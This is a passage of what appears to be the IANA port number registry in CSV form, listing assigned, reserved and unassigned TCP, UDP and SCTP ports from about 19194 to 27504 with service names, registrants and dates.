ua-secureagent,19194,udp,UserAuthority SecureAgent,[Reuven_Harrison_2],[Reuven_Harrison_2],2003-01,,,,, ,19195-19282,,Unassigned,,,,,,,, keysrvr,19283,tcp,Key Server for SASSAFRAS,[Mark_Valence],[Mark_Valence],,,,,, keysrvr,19283,udp,Key Server for SASSAFRAS,[Mark_Valence],[Mark_Valence],,,,,, ,19284-19314,,Unassigned,,,,,,,, keyshadow,19315,tcp,Key Shadow for SASSAFRAS,[Mark_Valence],[Mark_Valence],,,,,, keyshadow,19315,udp,Key Shadow for SASSAFRAS,[Mark_Valence],[Mark_Valence],,,,,, ,19316-19397,,Unassigned,,,,,,,, mtrgtrans,19398,tcp,mtrgtrans,[Katsuhito_Muroi],[Katsuhito_Muroi],,,,,, mtrgtrans,19398,udp,mtrgtrans,[Katsuhito_Muroi],[Katsuhito_Muroi],,,,,, ,19399-19409,,Unassigned,,,,,,,, hp-sco,19410,tcp,hp-sco,[Larry_Schwartz],[Larry_Schwartz],,,,,, hp-sco,19410,udp,hp-sco,[Larry_Schwartz],[Larry_Schwartz],,,,,, hp-sca,19411,tcp,hp-sca,[Larry_Schwartz],[Larry_Schwartz],,,,,, hp-sca,19411,udp,hp-sca,[Larry_Schwartz],[Larry_Schwartz],,,,,, hp-sessmon,19412,tcp,HP-SESSMON,[Gita_Murthy],[Gita_Murthy],,,,,, hp-sessmon,19412,udp,HP-SESSMON,[Gita_Murthy],[Gita_Murthy],,,,,, ,19413-19538,,Unassigned,,,,,,,, fxuptp,19539,tcp,FXUPTP,[Keiji_Okuma],[Keiji_Okuma],2005-08,,,,, fxuptp,19539,udp,FXUPTP,[Keiji_Okuma],[Keiji_Okuma],2005-08,,,,, sxuptp,19540,tcp,SXUPTP,[Keiji_Okuma],[Keiji_Okuma],2002-08,,,,, sxuptp,19540,udp,SXUPTP,[Keiji_Okuma],[Keiji_Okuma],2002-08,,,,, jcp,19541,tcp,JCP Client,[Yuji_Sasaki],[Yuji_Sasaki],,,,,, jcp,19541,udp,JCP Client,[Yuji_Sasaki],[Yuji_Sasaki],,,,,, ,19542-19787,,Unassigned,,,,,,,, mle,19788,udp,Mesh Link Establishment,[IESG],[IETF_Chair],2012-12-18,,,,, ,19788,tcp,Reserved,,,,,,,, ,19789-19997,,Unassigned,,,,,,,, iec-104-sec,19998,tcp,IEC 60870-5-104 process control - secure,[Grant_Gilchrist],[Grant_Gilchrist],2010-10-18,,,,, ,19998,udp,Reserved,,,,,,,, dnp-sec,19999,tcp,Distributed Network Protocol - Secure,[Grant_Gilchrist],[Grant_Gilchrist],2008-08-04,,,,, dnp-sec,19999,udp,Distributed Network Protocol - Secure,[Grant_Gilchrist],[Grant_Gilchrist],2008-08-04,,,,, dnp,20000,tcp,DNP,[Michael_Thesing],[Michael_Thesing],,,,,, dnp,20000,udp,DNP,[Michael_Thesing],[Michael_Thesing],,,,,, microsan,20001,tcp,MicroSAN,[Thomas_E_Ludwig],[Thomas_E_Ludwig],2004-02,,,,, microsan,20001,udp,MicroSAN,[Thomas_E_Ludwig],[Thomas_E_Ludwig],2004-02,,,,, commtact-http,20002,tcp,Commtact HTTP,[Tomas_Svoboda],[Tomas_Svoboda],2004-12,,,,, commtact-http,20002,udp,Commtact HTTP,[Tomas_Svoboda],[Tomas_Svoboda],2004-12,,,,, commtact-https,20003,tcp,Commtact HTTPS,[Tomas_Svoboda],[Tomas_Svoboda],2004-12,,,,, commtact-https,20003,udp,Commtact HTTPS,[Tomas_Svoboda],[Tomas_Svoboda],2004-12,,,,, ,20004,,Unassigned,,,,,,,, openwebnet,20005,tcp,OpenWebNet protocol for electric network,[BTicino_S_p_A],[BTicino_S_p_A],2008-04-09,,,,, openwebnet,20005,udp,OpenWebNet protocol for electric network,[BTicino_S_p_A],[BTicino_S_p_A],2008-04-09,,,,, ,20006-20011,,Unassigned,,,,,,,, ,20012,tcp,Reserved,,,,,,,, ss-idi-disc,20012,udp,Samsung Interdevice Interaction discovery,[Hong_Jungkih],[Hong_Jungkih],,,,,, ss-idi,20013,tcp,Samsung Interdevice Interaction,[Hong_Jungkih],[Hong_Jungkih],,,,,, ,20013,udp,Reserved,,,,,,,, opendeploy,20014,tcp,OpenDeploy Listener,[Todd_Scallan],[Todd_Scallan],2005-08,,,,, opendeploy,20014,udp,OpenDeploy Listener,[Todd_Scallan],[Todd_Scallan],2005-08,,,,, ,20015-20033,,Unassigned,,,,,,,, nburn-id,20034,tcp,"NetBurner ID Port IANA assigned this well-formed service name as a replacement for ""nburn_id"".",[Paul_Breed],[Paul_Breed],2003-11,,,,, nburn_id,20034,tcp,NetBurner ID Port,[Paul_Breed],[Paul_Breed],2003-11,,,,,"This entry is an alias to ""nburn-id"". This entry is now historic, not usable for use with many common service discovery mechanisms." nburn-id,20034,udp,"NetBurner ID Port IANA assigned this well-formed service name as a replacement for ""nburn_id"".",[Paul_Breed],[Paul_Breed],2003-11,,,,, nburn_id,20034,udp,NetBurner ID Port,[Paul_Breed],[Paul_Breed],2003-11,,,,,"This entry is an alias to ""nburn-id"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,20035-20045,,Unassigned,,,,,,,, tmophl7mts,20046,tcp,TMOP HL7 Message Transfer Service,[Tim_Riley],[Tim_Riley],2009-07-31,,,,, tmophl7mts,20046,udp,TMOP HL7 Message Transfer Service,[Tim_Riley],[Tim_Riley],2009-07-31,,,,, ,20047-20047,,Unassigned,,,,,,,, mountd,20048,tcp,NFS mount protocol,[Nicolas_Williams],[Nicolas_Williams],2010-08-09,,,,, mountd,20048,udp,NFS mount protocol,[Nicolas_Williams],[Nicolas_Williams],2010-08-09,,,,, nfsrdma,20049,tcp,Network File System (NFS) over RDMA,,,,,[RFC5666],,, nfsrdma,20049,udp,Network File System (NFS) over RDMA,,,,,[RFC5666],,, nfsrdma,20049,sctp,Network File System (NFS) over RDMA,,,,,[RFC5666],,, ,20050-20166,,Unassigned,,,,,,,, tolfab,20167,tcp,TOLfab Data Change,[Pierre_Couderc],[Pierre_Couderc],2006-03,,,,, tolfab,20167,udp,TOLfab Data Change,[Pierre_Couderc],[Pierre_Couderc],2006-03,,,,, ,20168-20201,,Unassigned,,,,,,,, ipdtp-port,20202,tcp,IPD Tunneling Port,[Vikki_Yin_Wei],[Vikki_Yin_Wei],2003-01,,,,, ipdtp-port,20202,udp,IPD Tunneling Port,[Vikki_Yin_Wei],[Vikki_Yin_Wei],2003-01,,,,, ,20203-20221,,Unassigned,,,,,,,, ipulse-ics,20222,tcp,iPulse-ICS,[Meggie_Garica_Woodru],[Meggie_Garica_Woodru],,,,,, ipulse-ics,20222,udp,iPulse-ICS,[Meggie_Garica_Woodru],[Meggie_Garica_Woodru],,,,,, ,20223-20479,,Unassigned,,,,,,,, emwavemsg,20480,tcp,emWave Message Service,[Harald_Striepe],[Harald_Striepe],2008-02-14,,,,, emwavemsg,20480,udp,emWave Message Service,[Harald_Striepe],[Harald_Striepe],2008-02-14,,,,, ,20481-20669,,Unassigned,,,,,,,, track,20670,tcp,Track,[Michael_Sweet],[Michael_Sweet],,,,,, track,20670,udp,Track,[Michael_Sweet],[Michael_Sweet],,,,,, ,20671-20998,,Unassigned,,,,,,,, athand-mmp,20999,tcp,At Hand MMP,[Stepan_Riha],[Stepan_Riha],,,,,, athand-mmp,20999,udp,AT Hand MMP,[Stepan_Riha],[Stepan_Riha],,,,,, irtrans,21000,tcp,IRTrans Control,[Marcus_Mueller],[Marcus_Mueller],2004-11,,,,, irtrans,21000,udp,IRTrans Control,[Marcus_Mueller],[Marcus_Mueller],2004-11,,,,, ,21001-21009,,Unassigned,,,,,,,, notezilla-lan,21010,tcp,Notezilla.Lan Server,[Conceptworld_Corporation],[Gautam_Jain],2013-08-20,,,,, ,21010,udp,Reserved,,,,,,,, ,21011-21552,,Unassigned,,,,,,,, rdm-tfs,21553,tcp,Raima RDM TFS,[Paul_Johnson],[Paul_Johnson],2011-05-02,,,,, ,21553,udp,Reserved,,,,,,,, dfserver,21554,tcp,MineScape Design File Server,[Michael_Purser],[Michael_Purser],2006-06,,,,, dfserver,21554,udp,MineScape Design File Server,[Michael_Purser],[Michael_Purser],2006-06,,,,, ,21555-21589,,Unassigned,,,,,,,, vofr-gateway,21590,tcp,VoFR Gateway,[Marty_Borden],[Marty_Borden],,,,,, vofr-gateway,21590,udp,VoFR Gateway,[Marty_Borden],[Marty_Borden],,,,,, ,21591-21799,,Unassigned,,,,,,,, tvpm,21800,tcp,TVNC Pro Multiplexing,[Brian_Blevins],[Brian_Blevins],,,,,, tvpm,21800,udp,TVNC Pro Multiplexing,[Brian_Blevins],[Brian_Blevins],,,,,, ,21801-21844,,Unassigned,,,,,,,, webphone,21845,tcp,webphone,[Toby_Hosterman],[Toby_Hosterman],,,,,, webphone,21845,udp,webphone,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-is,21846,tcp,NetSpeak Corp. Directory Services,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-is,21846,udp,NetSpeak Corp. Directory Services,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-cs,21847,tcp,NetSpeak Corp. Connection Services,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-cs,21847,udp,NetSpeak Corp. Connection Services,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-acd,21848,tcp,NetSpeak Corp. Automatic Call Distribution,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-acd,21848,udp,NetSpeak Corp. Automatic Call Distribution,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-cps,21849,tcp,NetSpeak Corp. Credit Processing System,[Toby_Hosterman],[Toby_Hosterman],,,,,, netspeak-cps,21849,udp,NetSpeak Corp. Credit Processing System,[Toby_Hosterman],[Toby_Hosterman],,,,,, ,21850-21999,,Unassigned,,,,,,,, snapenetio,22000,tcp,SNAPenetIO,[Kevin_Kuhns],[Kevin_Kuhns],,,,,, snapenetio,22000,udp,SNAPenetIO,[Kevin_Kuhns],[Kevin_Kuhns],,,,,, optocontrol,22001,tcp,OptoControl,[Kevin_Kuhns],[Kevin_Kuhns],,,,,, optocontrol,22001,udp,OptoControl,[Kevin_Kuhns],[Kevin_Kuhns],,,,,, optohost002,22002,tcp,Opto Host Port 2,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost002,22002,udp,Opto Host Port 2,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost003,22003,tcp,Opto Host Port 3,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost003,22003,udp,Opto Host Port 3,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost004,22004,tcp,Opto Host Port 4,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost004,22004,udp,Opto Host Port 4,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost004,22005,tcp,Opto Host Port 5,[Doug_Leany],[Doug_Leany],2006-09,,,,, optohost004,22005,udp,Opto Host Port 5,[Doug_Leany],[Doug_Leany],2006-09,,,,, ,22006-22124,,Unassigned,,,,,,,, dcap,22125,tcp,dCache Access Protocol,[Christoph_Anton_Mitt],[Christoph_Anton_Mitt],2009-03-10,,,,, ,22125,udp,Reserved,,,,,,,, ,22126-22127,,Unassigned,,,,,,,, gsidcap,22128,tcp,GSI dCache Access Protocol,[Christoph_Anton_Mitt],[Christoph_Anton_Mitt],2009-03-10,,,,, ,22128,udp,Reserved,,,,,,,, ,22129-22221,,Unassigned,,,,,,,, easyengine,22222,tcp,EasyEngine is CLI tool to manage WordPress Sites on Nginx server,[rtCamp_Solutions_Private_Limited],[Rahul_Bansal],2014-03-10,,,,, ,22222,udp,Reserved,,,,,,,, ,22223-22272,,Unassigned,,,,,,,, wnn6,22273,tcp,wnn6,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, wnn6,22273,udp,wnn6,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, ,22274-22304,,Unassigned,,,,,,,, cis,22305,tcp,CompactIS Tunnel,[Justin_Paupore],[Justin_Paupore],2007-08-16,,,,, cis,22305,udp,CompactIS Tunnel,[Justin_Paupore],[Justin_Paupore],2007-08-16,,,,, ,22306-22342,,Unassigned,,,,,,,, cis-secure,22343,tcp,CompactIS Secure Tunnel,[Justin_Paupore],[Justin_Paupore],2007-08-16,,,,, cis-secure,22343,udp,CompactIS Secure Tunnel,[Justin_Paupore],[Justin_Paupore],2007-08-16,,,,, ,22344-22346,,Unassigned,,,,,,,, wibukey,22347,tcp,WibuKey Standard WkLan,[Wolfgang_Voelker],[Wolfgang_Voelker],2007-06,,,,, wibukey,22347,udp,WibuKey Standard WkLan,[Wolfgang_Voelker],[Wolfgang_Voelker],2007-06,,,,, ,22348-22349,,Unassigned,,,,,,,, codemeter,22350,tcp,CodeMeter Standard,[Wolfgang_Voelker],[Wolfgang_Voelker],2007-06,,,,, codemeter,22350,udp,CodeMeter Standard,[Wolfgang_Voelker],[Wolfgang_Voelker],2007-06,,,,, codemeter-cmwan,22351,tcp,TPC/IP requests of copy protection software to a server,[WIBU-SYSTEMS_AG],[Wolfgang_Völker_2],2013-06-25,,,,, ,22351,udp,Reserved,,,,,,,, ,22352-22536,,Unassigned,,,,,,,, caldsoft-backup,22537,tcp,CaldSoft Backup server file transfer,[CaldSoft],[Mark_Caldwell],2011-08-12,,,,, ,22537,udp,Reserved,,,,,,,, ,22538-22554,,Unassigned,,,,,,,, vocaltec-wconf,22555,tcp,Vocaltec Web Conference,[Scott_Petrack],[Scott_Petrack],,,,,, vocaltec-phone,22555,udp,Vocaltec Internet Phone,[Scott_Petrack],[Scott_Petrack],,,,,, ,22556-22762,,Unassigned,,,,,,,, talikaserver,22763,tcp,Talika Main Server,[Laxman_C_Marathe],[Laxman_C_Marathe],2006-12,,,,, talikaserver,22763,udp,Talika Main Server,[Laxman_C_Marathe],[Laxman_C_Marathe],2006-12,,,,, ,22764-22799,,Unassigned,,,,,,,, aws-brf,22800,tcp,Telerate Information Platform LAN,[Timo_Sivonen],[Timo_Sivonen],,,,,, aws-brf,22800,udp,Telerate Information Platform LAN,[Timo_Sivonen],[Timo_Sivonen],,,,,, ,22801-22950,,Unassigned,,,,,,,, brf-gw,22951,tcp,Telerate Information Platform WAN,[Timo_Sivonen],[Timo_Sivonen],,,,,, brf-gw,22951,udp,Telerate Information Platform WAN,[Timo_Sivonen],[Timo_Sivonen],,,,,, ,22952-22999,,Unassigned,,,,,,,, inovaport1,23000,tcp,Inova LightLink Server Type 1,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport1,23000,udp,Inova LightLink Server Type 1,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport2,23001,tcp,Inova LightLink Server Type 2,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport2,23001,udp,Inova LightLink Server Type 2,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport3,23002,tcp,Inova LightLink Server Type 3,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport3,23002,udp,Inova LightLink Server Type 3,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport4,23003,tcp,Inova LightLink Server Type 4,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport4,23003,udp,Inova LightLink Server Type 4,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport5,23004,tcp,Inova LightLink Server Type 5,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport5,23004,udp,Inova LightLink Server Type 5,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport6,23005,tcp,Inova LightLink Server Type 6,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, inovaport6,23005,udp,Inova LightLink Server Type 6,[Chris_Koeritz_3],[Chris_Koeritz_3],2006-10,,,,, ,23006-23052,,Unassigned,,,,,,,, gntp,23053,tcp,Generic Notification Transport Protocol,[Growl_Project],[Chris_Forsythe],2012-02-07,,,,, ,23053,udp,Reserved,,,,,,,, ,23054-23271,,Unassigned,,,,,,,, ,23272,tcp,Reserved,,,,,,,, s102,23272,udp,S102 application,[Kimmo_Kymalainen],[Kimmo_Kymalainen],2009-08-26,,,,, ,23273-23332,,Unassigned,,,,,,,, elxmgmt,23333,tcp,Emulex HBAnyware Remote Management,[Maziar_Tamadon],[Maziar_Tamadon],2007-11-06,,,,, elxmgmt,23333,udp,Emulex HBAnyware Remote Management,[Maziar_Tamadon],[Maziar_Tamadon],2007-11-06,,,,, ,23334-23399,,Unassigned,,,,,,,, novar-dbase,23400,tcp,Novar Data,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, novar-dbase,23400,udp,Novar Data,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, novar-alarm,23401,tcp,Novar Alarm,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, novar-alarm,23401,udp,Novar Alarm,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, novar-global,23402,tcp,Novar Global,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, novar-global,23402,udp,Novar Global,[Keith_Kilroy],[Keith_Kilroy],2006-02,,,,, ,23403-23455,,Unassigned,,,,,,,, aequus,23456,tcp,Aequus Service,[James_Anson],[James_Anson],2009-02-12,,,,, ,23456,udp,Reserved,,,,,,,, aequus-alt,23457,tcp,Aequus Service Mgmt,[James_Anson],[James_Anson],2009-02-12,,,,, ,23457,udp,Reserved,,,,,,,, ,23458-23545,,Unassigned,,,,,,,, areaguard-neo,23546,tcp,AreaGuard Neo - WebServer,[SODATSW_spol],[Roman_Štěpánek],2012-05-31,,,,, ,23546,udp,Reserved,,,,,,,, ,23547-23999,,Unassigned,,,,,,,, med-ltp,24000,tcp,med-ltp,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-ltp,24000,udp,med-ltp,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-fsp-rx,24001,tcp,med-fsp-rx,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-fsp-rx,24001,udp,med-fsp-rx,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-fsp-tx,24002,tcp,med-fsp-tx,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-fsp-tx,24002,udp,med-fsp-tx,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-supp,24003,tcp,med-supp,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-supp,24003,udp,med-supp,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-ovw,24004,tcp,med-ovw,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-ovw,24004,udp,med-ovw,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-ci,24005,tcp,med-ci,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-ci,24005,udp,med-ci,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-net-svc,24006,tcp,med-net-svc,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, med-net-svc,24006,udp,med-net-svc,[Juergen_Fischbach],[Juergen_Fischbach],,,,,, ,24007-24241,,Unassigned,,,,,,,, filesphere,24242,tcp,fileSphere,[Carl_Cedergren],[Carl_Cedergren],,,,,, filesphere,24242,udp,fileSphere,[Carl_Cedergren],[Carl_Cedergren],,,,,, ,24243-24248,,Unassigned,,,,,,,, vista-4gl,24249,tcp,Vista 4GL,[Mark_Itzcovitz],[Mark_Itzcovitz],,,,,, vista-4gl,24249,udp,Vista 4GL,[Mark_Itzcovitz],[Mark_Itzcovitz],,,,,, ,24250-24320,,Unassigned,,,,,,,, ild,24321,tcp,Isolv Local Directory,[Mitchell_Bass],[Mitchell_Bass],2005-08,,,,, ild,24321,udp,Isolv Local Directory,[Mitchell_Bass],[Mitchell_Bass],2005-08,,,,, hid,24322,udp,Transport of Human Interface Device data streams,[Freebox_SAS],[Nicolas_Pouillon],2012-12-14,,,,, ,24322,tcp,Reserved,,,,,,,, ,24323-24385,,Unassigned,,,,,,,, intel-rci,24386,tcp,"Intel RCI IANA assigned this well-formed service name as a replacement for ""intel_rci"".",[Mark_Lewis_2],[Mark_Lewis_2],,,,,, intel_rci,24386,tcp,Intel RCI,[Mark_Lewis_2],[Mark_Lewis_2],,,,,,"This entry is an alias to ""intel-rci"". This entry is now historic, not usable for use with many common service discovery mechanisms." intel-rci,24386,udp,"Intel RCI IANA assigned this well-formed service name as a replacement for ""intel_rci"".",[Mark_Lewis_2],[Mark_Lewis_2],,,,,, intel_rci,24386,udp,Intel RCI,[Mark_Lewis_2],[Mark_Lewis_2],,,,,,"This entry is an alias to ""intel-rci"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,24387-24464,,Unassigned,,,,,,,, tonidods,24465,tcp,Tonido Domain Server,[Madhan_Kanagavel],[Madhan_Kanagavel],2008-07-18,,,,, tonidods,24465,udp,Tonido Domain Server,[Madhan_Kanagavel],[Madhan_Kanagavel],2008-07-18,,,,, ,24466-24553,,Unassigned,,,,,,,, binkp,24554,tcp,BINKP,[Max_Masyutin],[Max_Masyutin],,,,,, binkp,24554,udp,BINKP,[Max_Masyutin],[Max_Masyutin],,,,,, ,24555-24675,,Unassigned,,,,,,,, canditv,24676,tcp,Canditv Message Service,[Gary_Aston],[Gary_Aston],2009-03-10,,,,, canditv,24676,udp,Canditv Message Service,[Gary_Aston],[Gary_Aston],2009-03-10,,,,, flashfiler,24677,tcp,FlashFiler,[Ben_Oram],[Ben_Oram],,,,,, flashfiler,24677,udp,FlashFiler,[Ben_Oram],[Ben_Oram],,,,,, proactivate,24678,tcp,Turbopower Proactivate,[Ben_Oram],[Ben_Oram],,,,,, proactivate,24678,udp,Turbopower Proactivate,[Ben_Oram],[Ben_Oram],,,,,, ,24679,,Unassigned,,,,,,,, tcc-http,24680,tcp,TCC User HTTP Service,[Brian_Kennedy],[Brian_Kennedy],2006-08,,,,, tcc-http,24680,udp,TCC User HTTP Service,[Brian_Kennedy],[Brian_Kennedy],2006-08,,,,, ,24681-24753,,Unassigned,,,,,,,, cslg,24754,tcp,Citrix StorageLink Gateway,[Mark_Nijmeijer],[Mark_Nijmeijer],2009-04-17,,,,, ,24754,udp,Reserved,,,,,,,, ,24755-24849,,Unassigned,,,,,,,, ,24850,tcp,Reserved,,,,,,,, assoc-disc,24850,udp,Device Association Discovery,[Microsoft_Corporation_3],[Sachin_Sheth],2012-06-27,,,,, ,24851-24921,,Unassigned,,,,,,,, find,24922,tcp,Find Identification of Network Devices,[Jean_Paul_Moreaux],[Jean_Paul_Moreaux],,,,,, find,24922,udp,Find Identification of Network Devices,[Jean_Paul_Moreaux],[Jean_Paul_Moreaux],,,,,, ,24923-24999,,Unassigned,,,,,,,, icl-twobase1,25000,tcp,icl-twobase1,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase1,25000,udp,icl-twobase1,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase2,25001,tcp,icl-twobase2,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase2,25001,udp,icl-twobase2,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase3,25002,tcp,icl-twobase3,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase3,25002,udp,icl-twobase3,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase4,25003,tcp,icl-twobase4,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase4,25003,udp,icl-twobase4,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase5,25004,tcp,icl-twobase5,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase5,25004,udp,icl-twobase5,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase6,25005,tcp,icl-twobase6,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase6,25005,udp,icl-twobase6,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase7,25006,tcp,icl-twobase7,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase7,25006,udp,icl-twobase7,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase8,25007,tcp,icl-twobase8,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase8,25007,udp,icl-twobase8,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase9,25008,tcp,icl-twobase9,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase9,25008,udp,icl-twobase9,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase10,25009,tcp,icl-twobase10,[J_A_Sever],[J_A_Sever],,,,,, icl-twobase10,25009,udp,icl-twobase10,[J_A_Sever],[J_A_Sever],,,,,, ,25010-25470,,Unassigned,,,,,,,, rna,25471,sctp,RNSAP User Adaptation for Iurh,[Dario_S_Tonesi],[Dario_S_Tonesi],2011-02-07,,,,, ,25472-25575,,Unassigned,,,,,,,, sauterdongle,25576,tcp,Sauter Dongle,[Christian_Brecht],[Christian_Brecht],2010-12-15,,,,, ,25576,udp,Reserved,,,,,,,, ,25577-25603,,Unassigned,,,,,,,, idtp,25604,tcp,Identifier Tracing Protocol,[Huang_Neng-geng],[Huang_Neng-geng],2011-08-09,,,,, ,25604,udp,Reserved,,,,,,,, ,25605-25792,,Unassigned,,,,,,,, vocaltec-hos,25793,tcp,Vocaltec Address Server,[Scott_Petrack],[Scott_Petrack],,,,,, vocaltec-hos,25793,udp,Vocaltec Address Server,[Scott_Petrack],[Scott_Petrack],,,,,, ,25794-25899,,Unassigned,,,,,,,, tasp-net,25900,tcp,TASP Network Comm,[Martin_Ellis],[Martin_Ellis],2004-11,,,,, tasp-net,25900,udp,TASP Network Comm,[Martin_Ellis],[Martin_Ellis],2004-11,,,,, niobserver,25901,tcp,NIObserver,[Roman_Oliynyk],[Roman_Oliynyk],,,,,, niobserver,25901,udp,NIObserver,[Roman_Oliynyk],[Roman_Oliynyk],,,,,, nilinkanalyst,25902,tcp,NILinkAnalyst,[Roman_Oliynyk_2],[Roman_Oliynyk_2],2007-08-30,,,,, nilinkanalyst,25902,udp,NILinkAnalyst,[Roman_Oliynyk_2],[Roman_Oliynyk_2],2007-08-30,,,,, niprobe,25903,tcp,NIProbe,[Roman_Oliynyk],[Roman_Oliynyk],,,,,, niprobe,25903,udp,NIProbe,[Roman_Oliynyk],[Roman_Oliynyk],,,,,, ,25904-25953,,Unassigned,,,,,,,, bf-game,25954,udp,Bitfighter game server,[Christopher_Eykamp],[Christopher_Eykamp],2012-08-16,,,,, ,25954,tcp,Reserved,,,,,,,, bf-master,25955,udp,Bitfighter master server,[Christopher_Eykamp],[Christopher_Eykamp],2012-08-16,,,,, ,25955,tcp,Reserved,,,,,,,, ,25956-25999,,Unassigned,,,,,,,, quake,26000,tcp,quake,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, quake,26000,udp,quake,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, ,26001-26132,,Unassigned,,,,,,,, scscp,26133,tcp,Symbolic Computation Software Composability Protocol,[Alexander_Konovalov],[Alexander_Konovalov],2007-11-27,,,,, scscp,26133,udp,Symbolic Computation Software Composability Protocol,[Alexander_Konovalov],[Alexander_Konovalov],2007-11-27,,,,, ,26134-26207,,Unassigned,,,,,,,, wnn6-ds,26208,tcp,wnn6-ds,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, wnn6-ds,26208,udp,wnn6-ds,[Yasunari_Gon_Yamasit],[Yasunari_Gon_Yamasit],,,,,, ,26209-26259,,Unassigned,,,,,,,, ezproxy,26260,tcp,eZproxy,[Albert_C_Yang],[Albert_C_Yang],,,,,, ezproxy,26260,udp,eZproxy,[Albert_C_Yang],[Albert_C_Yang],,,,,, ezmeeting,26261,tcp,eZmeeting,[Albert_C_Yang],[Albert_C_Yang],,,,,, ezmeeting,26261,udp,eZmeeting,[Albert_C_Yang],[Albert_C_Yang],,,,,, k3software-svr,26262,tcp,K3 Software-Server,[Jim_Baldridge],[Jim_Baldridge],,,,,, k3software-svr,26262,udp,K3 Software-Server,[Jim_Baldridge],[Jim_Baldridge],,,,,, k3software-cli,26263,tcp,K3 Software-Client,[Jim_Baldridge],[Jim_Baldridge],,,,,, k3software-cli,26263,udp,K3 Software-Client,[Jim_Baldridge],[Jim_Baldridge],,,,,, ,26264,,De-registered,,,,2006-04-06,,,, ,26265-26485,,Unassigned,,,,,,,, exoline-tcp,26486,tcp,EXOline-TCP,[Lars_Mattsson],[Lars_Mattsson],2008-12-24,,,,, exoline-udp,26486,udp,EXOline-UDP,[Lars_Mattsson],[Lars_Mattsson],2008-12-24,,,,, exoconfig,26487,tcp,EXOconfig,[Urban_Fosseus],[Urban_Fosseus],2008-12-24,,,,, exoconfig,26487,udp,EXOconfig,[Urban_Fosseus],[Urban_Fosseus],2008-12-24,,,,, ,26488,,Unassigned,,,,,,,, exonet,26489,tcp,EXOnet,[Urban_Fosseus],[Urban_Fosseus],2008-12-24,,,,, exonet,26489,udp,EXOnet,[Urban_Fosseus],[Urban_Fosseus],2008-12-24,,,,, ,26490-26999,,Unassigned,,,,,,,, flex-lm,27000-27009,,FLEX LM (1-10),[Daniel_Birns],[Daniel_Birns],,,,,, ,27010-27344,,Unassigned,,,,,,,"Unauthorized Use Known on ports 27017, 27018 and 27019", imagepump,27345,tcp,ImagePump,[Richard_Minner],[Richard_Minner],,,,,, imagepump,27345,udp,ImagePump,[Richard_Minner],[Richard_Minner],,,,,, ,27346-27441,,Unassigned,,,,,,,, jesmsjc,27442,tcp,Job controller service,[Chris_Newman],[Chris_Newman],2010-10-15,,,,, jesmsjc,27442,udp,Job controller service,[Chris_Newman],[Chris_Newman],2010-10-15,,,,, ,27443-27503,,Unassigned,,,,,,,, kopek-httphead,27504,tcp,Kopek HTTP Head 